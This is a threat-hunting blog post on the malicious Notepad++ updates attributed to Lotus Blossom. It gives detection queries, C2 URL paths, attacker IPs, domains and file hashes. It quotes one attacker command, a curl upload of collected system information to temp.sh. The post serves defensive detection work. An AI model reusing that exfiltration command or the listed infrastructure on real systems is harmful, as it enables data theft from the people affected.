top of page

Threat Hunting performed for malicious Notepad++ updates

  • 10 hours ago
  • 3 min read
Analyst hunting for threats

Summary

  • On 2nd of February 2026 Notepad++ reported that their website had been compromised by an APT-group [1].


  • The attackers modified the update script so that specific targets were provided with malicious updates when their Notepad++ performed updates.


  • On the same day, Rapid7 released a blog post with indicators of compromise along with attributing the attack to the Chinese APT Group Lotus Blossom [2].


  • The day after, Kaspersky released an blog post with additional indicators of compromise as well as adding the observation that they had observed victims within El Salvador, Vietnam, Australia and Philippines [3].


  • The threat hunting efforts from SamurAI MDR Analysts were focused on searching for reported static and behavioral indicators as well as strengthen future detection of similar operations.


Technical Details

The attackers regularly rotated payloads and command and control servers in order to remain undetected and reduce linkage between targeted victims.


The utilized malware were a mix of CobaltStrike and a custom backdoor which Rapid7 named Chrysalis.


Threat Hunting Methodologies

The following subsections contains threat hunting methodologies utilized throughout the threat hunt.


Suspicious child processes from Notepad++ updater process

In order to investigate suspicious child processes executed by the Notepad++ updater, the following Advanced Query were utilized:


events | where parent_image endswith "\\gup.exe"

Search for URL paths utilized by the CobaltStrike Beacons

Based on the URL paths used by the CobaltStrike beacons, the following threat hunt was performed:


events
| where http_method=="POST" and uri_path in~ (    
"/users/admin",    
"/api/update/v1",    
"/api/FileUpload/submit",    
"/api/getInfo/v1",    
"/help/Get-Start",    
"/resolve",    
"/dns-query"
) and url_host !endswith "cloudflare-dns.com" and url_host !endswith "dns.google" and url_host !endswith ".quad9.net"


Search for temp.sh file upload

Kaspersky reported that the threat actor also utilized the website temp[.]sh to exfiltrate system information:


curl.exe -F "file=@1.txt" -s https://temp.sh/upload

A Sigma rule that would catch this behavior based on endpoint process events has been in place since November 2025 [4].


The following KQL query were used to hunt for similar behavior:


events | where url_host == "temp.sh" and http_method== "POST" and uri_path == "/upload"

Additionally, the Sigma ruled called "Legitimate API services sometimes abused for C2 communication" was updated to cover this behavior in our Hunting Engine to detect the activity within proxy logs [5].


Search for file and network artifacts

The reported network indicators and file hashes were also queried for.


events | where    
// ---- Exact IP matches (from both articles) ----    
dest_ip in (        
"45.76.155.202",   // Securelist: malicious update host (Chains #1 & #2)
"45.77.31.210",    // Securelist: Beacon download/C2        
"45.32.144.255",   // Securelist: malicious update host (Chain #3       
"95.179.213.0",    // Both: update host observed in October 2025     
 "61.4.102.97"      // Rapid7: resolves for api.skycloudcenter[.]com   
 )    
or   
// ---- Exact host matches (case-insensitive) ----    
url_host in~ (       
"cdncheck.it.com",     // Securelist: Beacon C2 and download paths        
"temp.sh",             // Securelist: staging/LOL-C2 for system info      
"self-dns.it.com",     // Securelist: system info upload        
"safe-dns.it.com",     // Securelist: downloader + Beacon C2        
"api.wiresguard.com",  // Both: Metasploit downloader / Beacon C2        "api.skycloudcenter.com" // Rapid7: Chrysalis backdoor C2    
) or     
// ---- File hashes in reports ----    
filehash_sha1 in ("8e6e505438c21f3d281e1cc257abdbf7223b7f5a", 
"90e677d7ff5844407b9c073e3b7e896e078e11cd","573549869e84544e3ef253bdba79851dcde4963a","13179c8f19fbf3d8473c49983a199e6cb4f318f0","4c9aac447bf732acc97992290aa7a187b967ee2c","821c0cafb2aab0f063ef7e313f64313fc81d46cd","06a6a5a39193075734a32e0235bde0e979c27228","9c3ba38890ed984a25abb6a094b5dbf052f22fa7","ca4b6fe0c69472cd3d63b212eb805b7f65710d33","0d0f315fd8cf408a483f8e2dd1e69422629ed9fd","2a476cfb85fbf012fdbe63a37642c11afa5cf020","d7ffd7b588880cf61b603346a3557e7cce648c93","94dffa9de5b665dc51bc36e2693b8a3a0a4cc6b8","21a942273c14e4b9d3faa58e4de1fd4d5014a1ed","7e0790226ea461bcc9ecd4be3c315ace41e1c122","f7910d943a013eede24ac89d6388c1b98f8b3717","73d9d0139eaf89b7df34ceeb60e5f8c7cd2463bf","bd4915b3597942d88f319740a9b803cc51585c4a","c68d09dd50e357fd3de17a70b7724f8949441d77","813ace987a61af909c053607635489ee984534f4","9fbf2195dee991b1e5a727fd51391dcc2d7a4b16","07d2a01e1dc94d59d5ca3bdf0c7848553ae91a51","3090ecf034337857f786084fb14e63354e271c5d","d0662eadbe5ba92acbd3485d8187112543bcfbf5", "9c0eff4deeb626730ad6a05c85eb138df48372ce")


References

[1] Notepad++ Hijacked by State-Sponsored Hackers

https://notepad-plus-plus.org/news/hijacked-incident-info-update/

[2] The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit

https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/

[3] The Notepad++ supply chain attack - unnoticed execution chains and new IoCs

https://securelist.com/notepad-supply-chain-attack/118708/

[4] Potential data exfiltration via curl

https://github.com/SamuraiMDR/sigma-rules/blob/main/rules/windows/process_creation/curl_data_exfiltration.yml

[5] Legitimate API services sometimes abused for C2 communication

https://github.com/SamuraiMDR/sigma-rules/commit/d0958537da12ec5ff46033e6d8c633978c1ec0bc


 
 
bottom of page